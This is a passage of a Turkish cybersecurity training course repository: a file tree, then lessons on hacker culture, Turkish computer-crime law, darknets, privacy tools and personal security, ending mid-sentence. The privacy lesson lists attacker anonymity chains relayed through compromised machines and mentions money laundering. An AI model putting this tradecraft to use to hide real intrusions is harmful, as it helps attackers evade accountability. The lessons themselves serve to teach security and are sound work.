├── 00-temeller ├── 00-hacking.md ├── 01-siber-guvenlik.md ├── 02-underground.md ├── 03-darknet.md ├── 04-gizlilik.md ├── 05-kisisel-guvenlik.md ├── 06-lab.md ├── 07-linux.md ├── 08-kriptoloji.md ├── 09-forensic.md ├── 0A-pasif-bilgi-toplama.md ├── README.md └── odevler │ ├── README.md │ ├── bitcoin-cuzdani.md │ ├── images │ ├── Metasploitable │ │ ├── 0.jpg │ │ ├── 1.jpg │ │ ├── 2.jpg │ │ ├── 3.jpg │ │ ├── 4.jpg │ │ ├── 5.jpg │ │ ├── 7.jpg │ │ ├── 8.jpg │ │ └── 9.jpg │ ├── crontab │ │ ├── 10.png │ │ ├── 11.png │ │ ├── 6.png │ │ ├── 7.png │ │ ├── 8.png │ │ └── 9.png │ ├── kali-linux │ │ ├── Create Virtual Hard Disk_014.png │ │ ├── Create Virtual Hard Disk_015.png │ │ ├── Create Virtual Hard Disk_016.png │ │ ├── Create Virtual Machine_011.png │ │ ├── Create Virtual Machine_012.png │ │ ├── Create Virtual Machine_013.png │ │ ├── NAT Network Details_008.png │ │ ├── Oracle VM VirtualBox Manager_002.png │ │ ├── Selection_005.png │ │ ├── Selection_010.png │ │ ├── Selection_017.png │ │ ├── Selection_018.png │ │ ├── Selection_021.png │ │ ├── Selection_022.png │ │ ├── Selection_023.png │ │ ├── Selection_025.png │ │ ├── Selection_026.png │ │ ├── Selection_027.png │ │ ├── Selection_028.png │ │ ├── Selection_029.png │ │ ├── Selection_030.png │ │ ├── Selection_031.png │ │ ├── Selection_032.png │ │ ├── Selection_033.png │ │ ├── Selection_034.png │ │ ├── Selection_035.png │ │ ├── Selection_036.png │ │ ├── Selection_037.png │ │ ├── Selection_038.png │ │ ├── Selection_039.png │ │ ├── Selection_040.png │ │ ├── Selection_041.png │ │ ├── Selection_042.png │ │ ├── Selection_043.png │ │ ├── Selection_044.png │ │ ├── Selection_045.png │ │ ├── Selection_046.png │ │ ├── Selection_047.png │ │ ├── Selection_048.png │ │ ├── Selection_049.png │ │ ├── Selection_050.png │ │ ├── Selection_051.png │ │ ├── Selection_052.png │ │ ├── Selection_053.png │ │ ├── Selection_054.png │ │ ├── Selection_055.png │ │ ├── Selection_057.png │ │ ├── Selection_058.png │ │ ├── Selection_059.png │ │ ├── Selection_060.png │ │ ├── Selection_062.png │ │ ├── Selection_063.png │ │ ├── Selection_065.png │ │ ├── Selection_1.png │ │ ├── Selection_2.png │ │ ├── Selection_3.png │ │ ├── VBoxAdditions.png │ │ ├── VirtualBox - Preferences_004.png │ │ ├── VirtualBox - Preferences_009.png │ │ ├── Workspace 1_056.png │ │ ├── Workspace 1_061.png │ │ ├── Workspace 1_064.png │ │ ├── pentest - Settings_019.png │ │ ├── pentest - Settings_020.png │ │ ├── pentest - Settings_024.png │ │ └── unity-panel_001.png │ ├── suid │ │ ├── 1.png │ │ ├── 2.png │ │ ├── 3.png │ │ └── 4.png │ ├── truecrypt │ │ ├── create.png │ │ ├── end.png │ │ ├── format.png │ │ ├── hash.png │ │ ├── hidden.png │ │ ├── hiddensize.png │ │ ├── local.png │ │ ├── pass2.png │ │ ├── password.png │ │ ├── reg1.1.png │ │ ├── reg1.png │ │ ├── reg2.2.png │ │ ├── reg2.png │ │ └── usb.png │ └── windows-sifre │ │ ├── 1.png │ │ ├── 2.png │ │ ├── 3.png │ │ └── 4.png │ ├── kali-linux-kurulumu.md │ ├── metasploitable.md │ ├── suid-crontab.md │ ├── truecrypt-kullanimi.md │ └── windows-sifre.md ├── 01-ag-guvenligi ├── 00-temel-network.md ├── 01-bilgi-toplama.md ├── 02-servis-saldirilari.md ├── 03-dos-saldirilari.md ├── 04-sifre-kirma.md └── README.md ├── 02-web-guvenligi ├── 00-temel-web.md ├── 01-bilgi-toplama.md ├── 02-saldiri-turleri.md ├── 03-korunma-yontemleri.md └── README.md ├── 03-yazilim-guvenligi ├── 00-tersine-muhendislige-giris.md ├── 01-zararli-yazilim-analizi.md ├── 02-mobil-yazilim-guvenligi.md ├── 03-uygulama-guvenligi.md └── README.md ├── 04-diger ├── 00-ctf.md ├── 01-donanim-guvenligi.md ├── 02-tasinabilir-saldiri-platformlari.md └── README.md ├── README.md └── logo.png /00-temeller/00-hacking.md: -------------------------------------------------------------------------------- 1 | # Hacking 2 | 3 | ## Hack 4 | 5 | - Herhangi bir sistemi amacı dışında kullanma, sorunlara üretilen yaratıcı çözümler ve genellikle yasak olarak nitelendirilen konularda bulunan yasal boşlukların genel adıdır. 6 | - Medya tarafından genellikle siber suçluların yaptıkları eylemler **hack** olarak nitelendirilmektedir. Ancak bu davranış tamamen yanlıştır. 7 | - Bir babaannenin yoğurt kabından saksı yapması da bir hack olayı iken bilgisayar grafiklerinde karekök formülünü integer formunda hesaplayan hızlı bir algoritma geliştirme de **hack** olarak nitelendirilir. 8 | - Gerçekleştirilen **hack** eyleminin diğer **hackerlar** tarafından takdir edilmesiyle, eylemin değerinde de artış yaşanmaktadır. İyi bir **hacker** yaptığı iyi **hackler** ile tanınır ve saygı duyulur. 9 | - Biz bu eğitim boyunca **hack** kavramını siber güvenlik alanı altında inceleyeceğiz. 10 | - Bu açıdan bakıldığında **hack** bir bilişim sistemi üzerindeki açıklığı kullanmak olarak nitelendirilebilir. 11 | - Kullanılan açıklığın izinli veya izinsiz kullanılması ile suçlu/suçsuz kimseler ortaya çıkmaktadır. 12 | - Örneğin bir bilişim sistemine izinsiz erişim sağlayan kişi **suçlu** durumuna gelirken, önceden anlaşmalı bir şekilde gerçekleştirilen güvenlik testlerinde bir sisteme erişim sağlayan kişi **güvenlik uzmanı** olarak tanımlanmaktadır. 13 | 14 | ## Hacker 15 | 16 | - En kısa haliyle **hack** yapan kişiye **hacker** denilmektedir. 17 | - **Hackerlar** kendi içlerinde dil, din, ırk, yaş gözetmeksizin herkese eşit olarak yaklaşmaktadır. 18 | - Statü olarak belirleyici etken tamamen bilgi seviyesidir. 19 | - **Hacker Etiği** ve **Hacker Manifestosu** düşünce yapılarını özetlemektedir. 20 | - **Hackerlar** farklı motivasyonlara sahip olabilmektedirler. Bu motivasyonlarından dolayı kendi aralarında gruplanmalar yaşanmıştır. 21 | 22 | ### Hacker Etiği 23 | 24 | - Access to computers—and anything which might teach you something about the way the world works—should be unlimited and total. Always yield to the Hands-On Imperative! 25 | - All information should be free 26 | - Mistrust authority—promote decentralization 27 | - Hackers should be judged by their hacking, not criteria such as degrees, age, race, sex, or position 28 | - You can create art and beauty on a computer 29 | - Computers can change your life for the better 30 | 31 | ### Hacker Manifestosu 32 | 33 | > Bugün bir diğeri daha yakalandı, boydan boya tüm gazetelerdeydi. "Bilgisayar suçundan genç biri tutuklandı", "Banka tahrifatından sonra hacker yakalandı"... Lanet olası çocuklar. 34 | > Hepsi birbirinin aynı. 35 | 36 | > Fakat 1950' lerin teknobeyni ve üç parçalı psikolojik yapınızla hiçbir hacker' ın gözlerinin arkasında neler olduğunu anlamaya çalıştınız mı? Onu bu kadar sert yapan neydi diye merakettiniz mi? Hangi güçler onu şekillendirdi, onu böylesine bir kalıba ne döktü? Ben bir Hacker-ım, dünyama girin... Benim dünyam okul hayatımla başlar... Diğer çocuklardan fazla zekiydim, bize öğrettikleri bu saçmalık beni sıkıyordu... Lanet olası beceriksizler. 37 | > Hepsi birbirinin aynı. 38 | 39 | > Ortaokul veya lisedeydim. Hocaların onbeşinci kez bir kesiri nasıl indirgeyeceklerini dinlemiştim. Ben anlamıştım. "Hayır hocam, size ödevimi gösteremem, ben onu kafamdan yaptım..." Lanet olası velet. Muhtemelen kopya çekmiştir. 40 | > Hepsi birbirinin aynı. 41 | 42 | > O gün bir şey keşfetmiştim. Bir bilgisayar buldum. Bir saniye, bu muhteşem. Tam istediğim gibi bir şey. Ne yapmasını istersem onu yapıyor. Eğer hata yaparsa, onu ben beceremediğimdendir. Beni sevmediğinden değil... Veya benden korktuğundan değil... Veya benim çok akıllı bir fırlama olduğumu düşündüğünden değil.. Ya da öğretmeyi sevmediğinden ve burda olmaması gerektiğinden değil... Lanet olası velet. Bütün yaptığı oyun oynamak. 43 | > Hepsi birbirinin aynı. 44 | 45 | > Ve birden bir şeyler oldu... Başka bir dünyaya bir kapı açıldı... Telefon hattında bir bağımlının damarlarındaki eroin gibi gezinmek, bir elektronik nabız dışarıya gönderildi, günden güne artan yeteneksizliklere karşı, bir sığınak aranıldı... Bir sığınak bulundu. "İşte bu... Burası benim ait olduğum yer." Buradaki herkesi tanıyorum... Hiçbiriyle tanışmamış, Konuşmamış ya da bir daha hiç haber almayacak olsam bile. Hepinizi tanıyorum... Lanet olası çocuk. Telefon hattını yine meşgul ediyor. 46 | > Hepsi birbirinin aynı. 47 | 48 | > Kıçınıza bahse girersiniz ki hepimiz birbirimizin aynısıyız... Bizler okulda biftek istediğimizde kaşıkla bebek maması ile doyurulanlarız... Pişirdiğiniz etin lokmaları çiğnenmiş ve lezzetsizdi. Biz sadistler tarafından kontrol edildik veya ruhsuzlar tarafından terslendik kale alınmadık. Öğretcek bir şeyleri olan çok azı bizim öğrenmeye istekli öğrenciler olduğumuzu fark ettiler. Fakat bu insanlar çöldeki su damlacıkları gibiydi. Bu bizim dünyamız şimdi... Elektronların ve elektronik düğmelerin dünyası, bilgi aktarım hızının güzelliği. Fırsatçı oburlar tarafından yönetilmeseydi sudan ucuz olacak servisleri, zaten var olan bir sistemi, bedava kullandığımız için bizleri suçlu diye itham ediyorsunuz. Keşfediyoruz... Ve siz bize suçlu dediniz. Bilginin peşinden gidiyoruz... Ve siz bize suçlu dediniz. Bizler derimizin rengi olmadan varolduk, milliyetsiz, hiçbir dine ait olmadan... Ve siz bize suçlu dediniz. Atom bombası ürettiniz, savaşlara girdiniz, cinayet işlediniz, hile yaptınız ve bize yalan söylediniz ve bunların bizim yararımıza olduğuna inanmamızı sağlamaya çalıştınız ve biz hala suçluyuz. Evet, ben bir suçluyum. Benim suçum merak etmek. Suçum insanları ne söyledikleri ve düşündükleri için yargılamak, nasıl göründüklerine göre değil. Suçum sizden daha akıllı olmam ki beni hiçbir zaman affetmeyeceksiniz. Ben bir hacker'ım ve bu benim manifestom. Bu bireyi durdurabilirsiniz fakat hepimizi durduramazsınız. 49 | > Hepsinden öte, hepimiz birbirimizin aynısıyız. 50 | 51 | > The Mentor(8 Ocak 1986) 52 | 53 | ## Hacker Sahneleri 54 | 55 | - Rusya 56 | - Amerika 57 | - Almanya 58 | - Romanya 59 | - Çin ve Kore 60 | - İran ve Pakistan 61 | - Türkiye 62 | 63 | ## Hacker Grupları 64 | 65 | - LulzSec 66 | - Masters of Deception 67 | - Legion of Doom 68 | - Cult of Dead Cow 69 | 70 | ## Ünlü Hackerlar 71 | 72 | - Jonathan James 73 | - Adrian Lamo 74 | - Kevin Mitnick 75 | - Kevin Poulsen 76 | - Robert Tappan Morris 77 | 78 | ## Büyük Olaylar 79 | 80 | - Google, Microsoft, NASA, FBI, CIA, Pentagon 81 | - Code Red, Stuxnet, I Love You 82 | - Estonya vs Rusya 83 | - Bank Of America, HSBC, JP Morgan 84 | 85 | ## Motivasyonlar 86 | 87 | - Pentester 88 | - Hacker 89 | - Script kiddie 90 | - Hacktivist 91 | - Advanced hacker 92 | - Cyber terrorist 93 | - Cracker 94 | - Phreaker 95 | - Fraudster 96 | -------------------------------------------------------------------------------- /00-temeller/01-siber-guvenlik.md: -------------------------------------------------------------------------------- 1 | # Siber Güvenlik 2 | 3 | ## Kavram Olarak Siber Güvenlik 4 | 5 | - Tüm bilişim sistemlerini kapsayan genel bir güvenlik kavramıdır. 6 | - Genellikle bilgi güvenliği ile karıştırılmaktadır. Ancak **siber güvenlik**, **bilgi güvenliğine** göre daha geniş kapsamlıdır. 7 | - Siber savaş, siber ordu gibi diğer kavramlar ile birlikte değerlendirilmektedir. 8 | 9 | ## Aktörler 10 | 11 | - Beyaz şapkalı hacker 12 | - Siyah şapkalı hacker 13 | - Gri şapkalı hacker 14 | 15 | ## Popüler Konular 16 | 17 | - Web 18 | - Ağ 19 | - Yazılım 20 | - Donanım 21 | - Fiziksel 22 | 23 | ## Siber Güvenlik Uzmanlığı 24 | 25 | - Siber güvenlik uzmanı **hacking** eylemlerini karşılıklı anlaşmalara dayanarak gerçekleştiren, gerçek **hacker** kabiliyetinde olması beklenen kişidir. 26 | - Amaç güvenlik testi yapılan sistemin güvenlik açıklıklarını ortaya çıkararak gerçek bir saldırganın zarar vermesini engellemektir. 27 | - Genellikle metodoloji tabanlı olarak gerçekleştirilir. 28 | - Ünvanları içerisinde geçen **profesyonel** kelimesi, bu işi para karşılığı yaptığını belirtmektedir. Doğal olarak **amatör** olarak yapan kişiler de bulunmaktadır. 29 | - Geçmişe bakıldığında **siber güvenlik** alanını **amatör** ruhlu kişiler şekillendirmiştir. Hala da şekillendirmeye devam etmektedir. Bu amatör ruhlu kişiler her zaman 1-0 önde olmaya çalışmaktadır. Uzun süredir de bunu başarıyla yapmışlardır. 30 | - Bu alanda uzmanlık için çeşitli sertifikalar önem taşımaktadır. 31 | - OSCP, CEH, LPT ve ülkemizde TSE'nin verdiği sertifikalar örnek verilebilir. 32 | - Her ne kadar sertifikalar belirli bir ölçek gösterse de, tam bir yetenek belirtmemektedir. 33 | - Bu yüzden siber güvenlik alanında uzman olan kişiler sürekli olarak kendilerini geliştirmek ve yeni trendleri takip etmek zorundadır. 34 | 35 | ## Ülkemizde Siber Güvenlik 36 | 37 | - Türkiye siber güvenlik alanında diğer devletler gibi kendine yer edinmeye çalışmaktadır. 38 | - Bu çalışmaların sonucunda **Siber güvenlik stratejisi ve eylem planı** oluşturulmuştur. Ancak diğer ülkeler ile kıyaslandığında henüz başlangıç aşamasındadır. 39 | - Özellikle ülke genelinde farkındalık konusunda büyük eksiklikler yaşanmaktadır. 40 | - **Siber güvenlik** kavramının tüm kitlelere doğru bir şekilde anlatılması gerekmektedir. 41 | 42 | ## Ülkemizde Siber Güvenlik İmkanları 43 | 44 | - Tubitak SGE 45 | - Aselsan, Havelsan, STM 46 | - PRODAFT, INVICTUS 47 | - BGA 48 | - ADEO 49 | - INNOVERA 50 | 51 | ## Bilişim Suçları 52 | 53 | - MADDE 243. – (1) Bir bilişim sisteminin bütününe veya bir kısmına, hukuka aykırı olarak giren ve orada kalmaya devam eden kimseye bir yıla kadar hapis veya adli para cezası verilir. 54 | - MADDE 243. – (2) Yukarıdaki fıkrada tanımlanan fiillerin bedeli karşılığı yararlanılabilen sistemler hakkında işlenmesi halinde, verilecek ceza yarı oranına kadar indirilir. 55 | - MADDE 243. – (3) Bu fiil nedeniyle sistemin içerdiği veriler yok olur veya değişirse, altı aydan iki yıla kadar hapis cezasına hükmolunur. 56 | - MADDE 244. – (1) Bir bilişim sisteminin işleyişini engelleyen veya bozan kişi, bir yıldan beş yıla kadar hapis cezası ile cezalandırılır. 57 | - MADDE 244. – (2) Bir bilişim sistemindeki verileri bozan, yok eden, değiştiren veya erişilmez kılan, sisteme veri yerleştiren, var olan verileri başka bir yere gönderen kişi, altı aydan üç yıla kadar hapis cezası ile cezalandırılır. 58 | - MADDE 244. – (3) Bu fiillerin bir banka veya kredi kurumuna ya da bir kamu kurum veya kuruluşuna ait bilişim sistemi üzerinde işlenmesi halinde, verilecek ceza yarı oranında artırılır. 59 | - MADDE 244. – (4) Yukarıdaki fıkralarda tanımlanan fiillerin işlenmesi suretiyle kişinin kendisinin veya başkasının yararına haksız bir çıkar sağlamasının başka bir suç oluşturmaması hâlinde, iki yıldan altı yıla kadar hapis ve beş bin güne kadar adlî para cezasına hükmolunur. 60 | - MADDE 245. – (1) Başkasına ait bir banka veya kredi kartını, her ne suretle olursa olsun ele geçiren veya elinde bulunduran kimse, kart sahibinin veya kartın kendisine verilmesi gereken kişinin rızası olmaksızın bunu kullanarak veya kullandırtarak kendisine veya başkasına yarar sağlarsa, üç yıldan altı yıla kadar hapis cezası ve adlî para cezası ile cezalandırılır. 61 | - MADDE 245. – (2) Sahte oluşturulan veya üzerinde sahtecilik yapılan bir banka veya kredi kartını kullanmak suretiyle kendisine veya başkasına yarar sağlayan kişi, fiil daha ağır cezayı gerektiren başka bir suç oluşturmadığı takdirde, dört yıldan yedi yıla kadar hapis cezası ile cezalandırılır. 62 | - MADDE 246. – (1) Bu bölümde yer alan suçların işlenmesi suretiyle yararına haksız menfaat sağlanan tüzel kişiler hakkında bunlara özgü güvenlik tedbirlerine hükmolunur 63 | - MADDE 124. – (1) Kişiler arasındaki haberleşmenin hukuka aykırı olarak engellenmesi halinde, altı aydan iki yıla kadar hapis veya adlî para cezasına hükmolunur. 64 | - MADDE 124. – (2) Kamu kurumları arasındaki haberleşmeyi hukuka aykırı olarak engelleyen kişi, bir yıldan beş yıla kadar hapis cezası ile cezalandırılır. 65 | - MADDE 124. – (3) Her türlü basın ve yayın organının yayınının hukuka aykırı bir şekilde engellenmesi halinde, ikinci fıkra hükmüne göre cezaya hükmolunur. 66 | 67 | -------------------------------------------------------------------------------- /00-temeller/02-underground.md: -------------------------------------------------------------------------------- 1 | # Underground 2 | 3 | ## Underground Kavramı 4 | 5 | - Genellikle hackerların bilgi paylaşımında bulundukları tüm bölgeler **underground** olarak nitelendirilmektedir. 6 | - Bu bölgeler web üzerinde olabileceği gibi irc, jabber gibi benzeri platformlar üzerinde de olabilmektedir. 7 | 8 | ## Underground Dergiler 9 | 10 | - Bu tarz dergilerden en ünlüsü şüphesiz ki [Phrack][1] dergisidir. İçeriği ve tarzı ile hackerlar arasında ayrı bir yere sahiptir. 11 | - Diğer dergilere örnek olarak da **Prophile** ve **Loopback** verilebilir. 12 | 13 | ## Siber Suçlar 14 | 15 | - Eski tarihler **underground** platformlarda bilgi paylaşımı ön planda iken artık yerini siber suçlara bırakmıştır. 16 | - Bu kapsamda çalınan özel verilerin(kredi kartı, banka bilgiler, kişisel kayıtlar vs), sıfırıncı gün açıklıklarının, sunucu ve platform hesaplarının satıldıkları ortamlara dönmeye başlamıştır. 17 | 18 | ## Hackerspace 19 | 20 | - İlk kısımda bahsedilen **hacker** akımının temsilcileri kendisi gibi düşünen kimseler ile **hackerspace** diye bahsedilen oluşumlar kurmaktadır. 21 | - Bu oluşumların tüm hepsi **siber güvenlik** kavramı ile ilgilenmemektedir. 22 | - [Chaos Computer Club][2] ağırlıklı olarak siber güvenlik ile ilgilenen bir **hackerspace** oluşumudur. 23 | - Örneğin Türkiye'de yer alan [İstanbul Hackerspace][3], [Denizli Hackerspace][4] ve [Trabzon Hackerspace][5] ağırlıklı olarak siber güvenlik ile ilgilenmemektedir. 24 | 25 | ## Ödev 26 | 27 | - http://www.textfiles.com/hacking/ 28 | - http://phrack.org/issues/64/4.html 29 | - http://phrack.org/issues/7/3.html 30 | - http://phrack.org/issues/67/16.html 31 | - http://phrack.org/issues/64/17.html 32 | - http://phrack.org/issues/65/15.html 33 | - http://phrack.org/issues/68/19.html 34 | - http://phrack.org/issues/47/21.html 35 | 36 | 37 | [1]: http://www.phrack.org/ 38 | [2]: https://www.ccc.de/en/ 39 | [3]: https://istanbulhs.org/ 40 | [4]: http://www.denizlihs.org/ 41 | [5]: http://blog.trabzonhs.org/ 42 | -------------------------------------------------------------------------------- /00-temeller/03-darknet.md: -------------------------------------------------------------------------------- 1 | # Darknet 2 | 3 | ## Darknet Kavramı 4 | 5 | - **Darknet** veya bir diğer tabir ile **Deepweb** hackerların kendilerini internetten izole etme düşüncesiyle ortaya çıkmış kavramlardır. 6 | - Burada gerçekleştirilen izolasyon bazen gizlilik üzerineyken bazen de bilgi paylaşımı üzerinedir. 7 | - Günümüzde bazı bu tarz networkler siber suç yuvası haline dönmüştür. 8 | - Haliyle yetkililerin üzerinde çalışmalar yapmaya başladığı bir alan haline gelmiştir. 9 | 10 | ## Önemli Darknetler 11 | 12 | - [Chaos Network][1], [IP Aralıkları][2] 13 | - [DN42][3], [IP Aralıkları ve Görselleştirme][4] 14 | - [Freenet][5] 15 | - [Anonet][6] 16 | - [TOR][7] 17 | 18 | ## Örnek 19 | 20 | - Chaos network yapısına içeriden bakış. [Node Durumları][8] 21 | 22 | ## Ödev 23 | 24 | - DN42 networküne kişisel sunucu ile dahil olma, BGP protokolünün ve mesh networklerinin çalışma prensibini anlama. 25 | - TOR ağının çalışma prensibinin araştırılması, hangi şartlarda neden güvensiz olduğunun kavranması. 26 | 27 | [1]: http://wiki.hamburg.ccc.de/index.php/ChaosVPN 28 | [2]: http://wiki.hamburg.ccc.de/ChaosVPN:IPRanges 29 | [3]: https://dn42.net/ 30 | [4]: https://io.nixnodes.net/ 31 | [5]: https://freenetproject.org/ 32 | [6]: http://anonet.org 33 | [7]: https://www.torproject.org/ 34 | [8]: http://vpnhub1.hack/chaosvpn.png 35 | -------------------------------------------------------------------------------- /00-temeller/04-gizlilik.md: -------------------------------------------------------------------------------- 1 | # Gizlilik 2 | 3 | ## Gizlilik İhtiyacı 4 | 5 | - Siber güvenlik alanıyla uğraşan herkes gizlilik ihtiyacı duymaktadır. 6 | - Her ne kadar bir saldırgan olmasanız da bu gereklilik geçerlidir. 7 | - Örneğin bir saldırgan büyük bir firmadan çaldığı özel bilgileri kimsenin eline geçmemesi ve yakalandığı takdirde güvenlik birimlerinden saklama amaçlı olarak gizlilik ihtiyacı duymaktadır. Ancak beyaz şapkalı bir güvenlik uzmanı ise güvenlik testi sonucunda elde ettiği çok benzer önemli verileri saklama ihtiyacı duyacaktır. 8 | - Çünkü bu tarz verilerin bir şekilde başka kişilerin eline geçmesi hem çalıştığı firmaya itibar kaybı yaşatacak iken, hem de güvenlik testi yapılan firma ile işbirliklerinin bozulmasına yol açacaktır. 9 | - Bu yüzden siber güvenlik alanında çalışma yapan herkesin veri güvenliğine, gizliliğine ihtiyacı vardır. 10 | 11 | ## İnternette Gizlenme 12 | 13 | - Hackerlar internette gizlenmek için çok farklı teknikler kullanmaktadır. 14 | - Bunların en ünlüsü şüphesiz ki VPN kullanımıdır. 15 | - Ancak tek başına VPN kullanımı her zaman yeterli olmamaktadır. 16 | - İşte bu yüzden saldırganlar, hedeflerine göre gizlilik derecelerini değiştirmektedir. 17 | - Bunun için aşağıdaki benzer kombinasyonlar kurulabilmektedir. 18 | - Burada HACKED kelimesi hackerlar tarafından daha önceden ele geçirilmiş sunucuları veya kişisel bilgisayarları belirtmektedir. 19 | 20 | ### Bazı Kombinasyonlar 21 | 22 | - ATTACKER -> VPN -> TARGET 23 | - ATTACKER -> VPN -> VPN -> TARGET 24 | - ATTACKER -> VPN -> HACKED -> HACKED -> ... -> TARGET 25 | - ATTACKER -> VPN -> HACKED -> HACKED -> ... -> VPN -> TARGET 26 | - ATTACKER -> VPN -> DARKNET -> VPN -> TARGET 27 | - ATTACKER -> VPN -> DARKNET -> TARGET 28 | - ATTACKER -> DARKNET -> TARGET 29 | - ATTACKER -> HACKED -> HACKED -> .. -> TARGET 30 | 31 | ## Siber Güvenlik Açısından 32 | 33 | - Siber güvenlik uzmanları da bazı zamanlar içerisinde gizlilik ihtiyacı duymaktadır. 34 | - Örneğin X ülkesinde savunma sanayi firmasında çalışan bir siber güvenlik uzmanı, gün içerisinde çeşitli hacker forumlarını vs takip etmesi gerekmektedir. 35 | - Eğer doğrudan çalıştığı firmanın IP adresi ile bu tarz forumlara bağlanırsa, bu hem kimliklerini ortaya çıkaracaktır hem de hackerların ilgili firmaya yönelmesine sebep olacaktır. 36 | - Bu yüzden siber güvenlik uzmanları da kendi VPN'lerine sahip olmalıdır. 37 | 38 | ## Anonim Para 39 | 40 | - Hackerlar gizlilik için VPN veya benzeri şekilde çeşitli sunuculara ihtiyaç duymaktadır. 41 | - Bu ihtiyaçlarını yasa dışı yollar ile elde edebilecekleri gibi anonim para kullanarak da gerçekleştirmektedirler. 42 | - En ünlü anonim para birimi ise [Bitcoin][1]'dir. 43 | - Temelinde kriptografik sonuçların olduğu Bitcoin hackerların vazgeçilmezidir. 44 | - Her bir ticaret için ayrı oluşturulan cüzdanlar sayesinde sahiplik olayı ortadan kalkmaktadır. 45 | - Ayrıca ilk başta legal yollardan döndürülen paranın da anonimleştirilmesi için **Para Yıkama** denilen teknikler kullanılmaktadır. 46 | - Yukarıda bahsedildiği gibi siber güvenlik uzmanlarının da internet üzerinden çeşitli ticaret yapmaları gerekebilmektedir. 47 | - Örneğin alacakları VPN servislerinin ödemelerini kendi hesapları yerine bitcoin üzerinden yapmayı tercih etmektedir. 48 | - Aynı şekilde bitcoin cüzdanlarına aktarılacak paraları da gene yasal olan prepaid kartlar aracılığı ile kendi cebinden sağlayabilmektedir. 49 | 50 | ## Veri Güvenliği 51 | 52 | - Hackerlar ele geçirdikleri verileri, siber güvenlik uzmanları da işleri sırasında elde ettikleri verileri saklama ihtiyacı duymaktadır. 53 | - Bunun için en çok kullanılan araç şüphesiz ki [Truecrypt][9] aracıdır. 54 | - Her ne kadar geliştirilmesinin durdurulması konusunda çeşitli şüpheler bulunsa da aktif olarak hem siber güvenlik uzmanları hem de hackerlar tarafında sıkça kullanılmaktadır. 55 | - Veri güvenliği kısmında diğer bir önemli nokta da [PGP][6]'dir. 56 | - Ağırlıklı olarak mail iletişimi sırasında kullanılsa da verilerin saklanması konusunda da sıkça kullanılmaktadır. 57 | - Gmail veya benzer bir mail sağlayıcısını kullanan hem saldırgan hem de uzmanlar, mail göndermek istedikleri kişinin public keyi ile veriyi şifreleyip karşı tarafa göndermektedir. 58 | - Maili şifreli bir şekilde alan karşı karaf ise elinde bulunan private key ile orjinal maile ulaşmaktadır. 59 | - Bu noktada [PGP][6] sadece şifreleme yazılımı olarak düşünülmemelidir. 60 | - Şifreleme ve imzalama kullanım alanlarının başında gelmektedir. 61 | 62 | ## Ödev 63 | 64 | - [Digitalocean][2], [linode][3] gibi sağlayıcılardan alınacak ucuz linux sunucular içerisine kişisel vpn kurulması ve bağlantı gerçekleştirilmesi. 65 | - Bitcoin cüzdanı oluşturulması ve saklanması. 66 | - [Tails][4], [whonix][5] gibi işletim sistemlerinin kullanılması ve amaçlarının kavranması. 67 | - Harici bir diski veya USB diski truecrypt containeri haline getirme, aynı container içerisinde hidden container oluşturma 68 | - Kişisel public-private key ikililerinin oluşturulması, [PGP][6] kullanılması, [Enigmail][7] ile imzalı mail gönderilmesi. 69 | - [PGP][6] ile simetrik şifreli dosya oluşturulması, [PGP][6] ile asimetrik şifreli dosya oluşturulması. 70 | - Jabber clienti kurulması, [OTR][8] kullanılması. 71 | - Prepaid kart sahibi olma. 72 | 73 | [1]: https://bitcoin.org/tr/ 74 | [2]: https://www.digitalocean.com/ 75 | [3]: https://www.linode.com/ 76 | [4]: https://tails.boum.org/ 77 | [5]: https://www.whonix.org/ 78 | [6]: https://en.wikipedia.org/wiki/Pretty_Good_Privacy 79 | [7]: https://www.enigmail.net/ 80 | [8]: http://wiki.xmpp.org/web/OTR 81 | [9]: http://truecrypt.sourceforge.net/ 82 | 83 | 84 | -------------------------------------------------------------------------------- /00-temeller/05-kisisel-guvenlik.md: -------------------------------------------------------------------------------- 1 | # Kişisel Güvenlik 2 | 3 | ## Gereksinim 4 | 5 | - Bir önceki başlıklarda bahsedildiği üzere internet çok da güvenli bir ortam değil. 6 | - Bu yüzden siber güvenlik uzmanlarının kendisini ve verilerini güvende tutması gerekmektedir. 7 | - %100 güvenlikten bahsedilemeyecek olmasına rağmen önlemlerini alması çok önemlidir. 8 | - Yakın zamanda yaşanan [Hackingteam][1] vakası bunu doğrular niteliktedir. 9 | 10 | ## İşletim Sistemi Güvenliği 11 | 12 | - Kullanılan işletim sisteminin güvenlik içerisinde ciddi derecede önemi vardır. 13 | - Burada güvenlikten bahsedilen hem sistem içerisine sızabilme hem de verilerin başka kimseler tarafından paylaşılması olabilmektedir. 14 | - Örneğin Windows 10 işletim sisteminin gizliliğinizi tehdit edecek bir çok [özelliği][2] ortaya çıkmıştır. 15 | - Bu yüzden özgür ve açık kaynaklı işletim sistemlerine yönelmek doğru olacaktır. 16 | - Burada yapılan büyük bir hata da [Kali][3] veya [Blackarch][4] gibi güvenlik alanında çalışanlara özel geliştirilmiş GNU/Linux dağıtımlarını host sistem olarak kullanmaktır. Bu kişisel güvenliği riske atacak bir durumdur. 17 | - Host olarak [Arch Linux][5] veya [Gentoo][6] gibi işletim sistemlerini kullanmak daha doğru olacaktır. 18 | - Tabi host işletim sistemlerinin [full disk encryption][7] olarak kurulması büyük önem taşımaktadır. 19 | - Aynı şekilde işletim sistemi güvenliğinin sağlanmasından sonra BIOS güvenliği de ayrı bir önem taşımaktadır. 20 | 21 | ## Veri Güvenliği 22 | 23 | - [Gizlilik][18] kısmında da bahsedildiği üzere günlük hayatta [Truecrypt][8] ve [PGP][9] ile veri güvenliği sağlanabilmektedir. 24 | 25 | ## Mobil Güvenlik 26 | 27 | - Mobil cihazların kullanım oranında yer alan ciddi yükseliş, hackerlar açısından bu alanı cezbeder hale gelmiştir. 28 | - O yüzden siber güvenlik alanında uğraşan kişilerin mobil cihazlarının güvenliklerini de sağlamaları gerekmektedir. 29 | - Örneğin Android işletim sistemine sahip cihazlarda tüm cihazın şifrelenmesi özelliği aktif olarak tutulmalıdır. 30 | - Bunun yanında çeşitli uygulamaların da kullanılması tavsiye edilmektedir. 31 | - Örnek olarak [Redphone][10], [K9 Mail][11], [Swift Wifi][12], [AIMSICD][13] verilebilir. 32 | 33 | ## Sosyal Medya Güvenliği 34 | 35 | - Facebook, twitter gibi sosyal medya kullanımlarına ayrıca dikkat edilmesi gerekmektedir. 36 | - Otomatize araçlar ile rahatlıkla bilgi toplanması ve sınıflandırma yapma şansı tanımaktadır. 37 | - Ayrıca büyük saldırılarda büyük veri kaçaklarına sebep olmaktadır. 38 | - Günümüzde çokça meşhur olan anlık mesajlaşma yazılımlarına da ayrıca 